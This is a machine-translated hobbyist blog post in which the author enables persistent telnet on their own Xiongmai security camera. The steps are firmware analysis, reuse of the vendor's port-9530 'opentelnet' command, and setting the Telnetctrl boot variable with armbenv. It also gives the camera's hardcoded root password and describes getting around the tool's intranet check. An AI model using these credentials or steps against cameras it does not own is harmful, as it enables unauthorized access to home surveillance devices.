Research on remote open telnet for male-mai camera

Years ago bought a male mai camera, the home for security monitoring, the camera is actually installed Linux system embedded device, after hand, for its not the default to open the Telnet service feel very uncomfortable, so intends to hack the most simple method is actually TTL connected to open, The second is to download the firmware directly after the firmware, in the startup script to increase the start telnetd statement after the brush in, but because it is a new buy, do not want to lose the warranty, but also want to take the opportunity to study learning, so only consider there is no way to open the remote from the firmware start, First go to the official website to download the latest firmware download after the local decompression, see the definition of the next BusyBox list, indeed there is telnetd, and/bin below also established telnetd alias, that is, to support the Telnet service, It's just not turned on. Search the firmware file under the configuration of the next Telnet, also did not find the relevant configuration, this road is not feasible from the official customer service, under the rhetoric, to find the official Telnet to open the tool opentelnet, After entering the target device IP, you can remotely turn on the device's Telnet service. But the tool has a few limitations 1. You can only temporarily turn on Telnet, and you'll have to turn it back on after the camera restarts 2. The tool must be entered with a one-time super password, And this password to find the customer service can be calculated 3. The tool will detect the input IP address, only the internal network device using Super Password This is relatively simple, simple research after the hack off, intranet use is also simple, local do a port mapping is also bypassed just temporarily on the Telnet temporarily open no way, Every time you restart and then go to Telnet is also troublesome AH so began to study the permanent way to open telnet There are two ways to open 1. As with temporary Telnet, the system itself supports a permanently opened command 2. The system does not support a command that is permanently opened, However, the telnetd can be added to the startup script, to achieve the system startup automatically start the Telnet service for the purpose of first grasping the tool, found that the camera and the 9530 port to communicate, sent a opentelnet:o Penonce command to the camera then telnet to the camera, use the command Netstat-ap to see who is using the 9530 port

# netstat-apactive Internet connections (servers and established) Proto RECV-Q send-q Local address Foreign address State Pid/Program name TCP0      0 0.0.0.0:34567           0.0.0.0:* LISTEN1190/sofiatcp0      0 0.0.0.0:554             0.0.0.0:* LISTEN1190/sofiatcp0      0 0.0.0.0: www0.0.0.0:* LISTEN1190/sofiatcp0      0 0.0.0.0: Telnet0.0.0.0:* LISTEN1169/telnetdtcp0      0 0.0.0.0:23000           0.0.0.0:* LISTEN1190/sofiatcp0      0 0.0.0.0:9530            0.0.0.0:* LISTEN1165/dvrhelper

Dvrhelper

What the hell is this?

Because the camera busybox command is incomplete, in the inside to find things and analysis are troublesome, so still in the local firmware analysis it.

Search for Dvrhelper in the firmware folder, find the link to Dvrbox, and find the text in Dvrbox

Besides finding opentelnet:openonce, I found opentelnet:forever.

As the name implies, this statement is the permanent opening of the Telnet statement?

Change the previous Opentelnet tool to change the command sent from Openonce to Opentelnet:forever

Restart the camera after execution, Telnet service is still not started, shit, it seems to be mistaken for something, or the system does not support the permanent opening of Telnet? This road is already out of the way. Start looking for a writable directory of the system and find only the following three/mnt/mtd/utils /var/tmp where/utils is the memory system, after reboot will be emptied, so not this directory/var/tmp is also a temporary folder, restart will be deleted, so it is not this directory originally tried to modify the/etc/init.d folder under the RCS file, Do the boot telnetd but the file is read-only and the study has not found a way to modify the file or its sub-process/MNT/MTD it? Study half-day/MNT/MTD, also have no clue, change can change, but can't add to the startup item but it may also be the use of files as a configuration file, startup detects that the file exists when the execution of telnetd, otherwise not executed, this can only be found from the firmware answer is still research Dvrbox file

#strings Dvrbox | grep telnettelnetctrllibdvr:get Telnetctrl fialed, Telnetctrl=1killall  Telnetdmacguarder:close telnetd Forever

is Telnetctrl the configuration parameter name?

Using Telnetctrl in the Firmware folder Global Search discovery only mentions this parameter again in armbenv what is armbenv? Execute armbenv command, prompt to print environment information using the-R parameter continue armbenv-r based on the results and individual guesses, I think Armbenv is to set the system startup environment variable with another it has a-s parameter, you can set param, or try? Execute the following command armbenv-s Telnetctrl 1 prompt to successfully execute ARMBENV- R found Telnetctrl already exists restart direct Telnet succeeded! Note 1.armbenv tool should be read and write Uboot Configuration tool, so in the file system, of course, can not find the corresponding configuration record 2.telnet account password is actually very simple, after the firmware decompression, view romfs-x.cramfs\etc\passwd file, There is encrypted password string, the password string in the search engine, search, found the corresponding password Xiong mai this camera's account password is root XMHDIPC

Research on remote open telnet for male-mai camera